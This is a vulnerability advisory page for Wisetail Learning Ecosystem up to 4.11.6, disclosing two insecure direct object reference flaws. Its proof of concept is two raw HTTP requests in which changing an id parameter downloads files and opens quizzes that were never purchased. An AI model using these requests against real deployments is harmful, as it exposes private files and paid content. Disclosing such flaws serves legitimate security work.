Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormS. M. Zia Ur RashidPACKETSTORM:149356
HistorySep 13, 2018 - 12:00 a.m.

Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

2018-09-1300:00:00
S. M. Zia Ur Rashid
packetstormsecurity.com
42

0.001 Low

EPSS

Percentile

33.6%

JSON
`Title: MULTIPLE IDOR VUNLERABILITies ON WISETAIL LEARNING ECOSYSTEM (LE)  
UPTO V4.11.6  
  
  
  
*D**ate:* 12/09/2019  
  
*A**uthor:* S. M. Zia Ur Rashid  
  
*Vendor Homepage:* wisetail.com  
  
*Author Contact: *https://www.linkedin.com/in/ziaurrashid/  
  
*Affected Version:* <= 4.11.6  
  
*Assaigned CVE: *CVE-2018-16970, CVE-2018-16971  
  
  
  
*Description:* Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from  
multiple insecure direct object reference (IDOR) vulnerability that allows  
to download files and access to the non-purchased course quiz test via a  
modified id parameter.  
  
  
  
*Proof-of-Concep (POC):*  
  
  
*// File Disclosure*  
  
  
  
GET /eco_download.php?id=2639 HTTP/1.1  
  
Host: xxxxxxx  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101  
Firefox/63.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
DNT: 1  
  
Connection: close  
  
Cookie: xxxxxxxxxxxxxx  
  
Upgrade-Insecure-Requests: 1  
  
  
  
*// Access Quiz Test*  
  
  
  
GET /eco_test.php?id=29 HTTP/1.1  
  
Host: xxxxxxx  
  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101  
Firefox/63.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
DNT: 1  
  
Connection: close  
  
Cookie: xxxxxxx  
  
Upgrade-Insecure-Requests: 1  
  
  
  
*Video POC:* https://youtu.be/l3msLYdI3fI  
  
  
  
*References:*  
  
https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971  
  
  
*Regards,*  
*S M Zia Ur Rashid*  
Student, Dept. of EEE, International Islamic University Chittagong  
Student Ambassador, IEEEmadC  
Public Relation Ambassador, IEEEXtreme Programming Competition 12.0  
Webmaster, IEEE Bangladesh Section Student Activities Committee 2018  
Webmaster, IEEE IIUC Student Branch (2018)  
Contact: E-mail <[email protected]> *|* Web <https://ziaurrashid.com/>  
  
Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn  
<https://www.linkedin.com/in/ziaurrashid>  
`

Related

nvd 2
cvelist 2
cve 2
prion 2
nvd
nvd
CVE-2018-16970
2018-09-12 20:29:00
CVE-2018-16971
2018-09-12 20:29:00
cvelist
cvelist
CVE-2018-16970
2018-09-12 20:00:00
CVE-2018-16971
2018-09-12 20:00:00
cve
cve
CVE-2018-16970
2018-09-12 20:29:00
CVE-2018-16971
2018-09-12 20:29:00
prion
prion
Design/Logic Flaw
2018-09-12 20:29:00
Design/Logic Flaw
2018-09-12 20:29:00

0.001 Low

EPSS

Percentile

33.6%

JSON
Related for PACKETSTORM:149356
nvd2cvelist2cve2prion2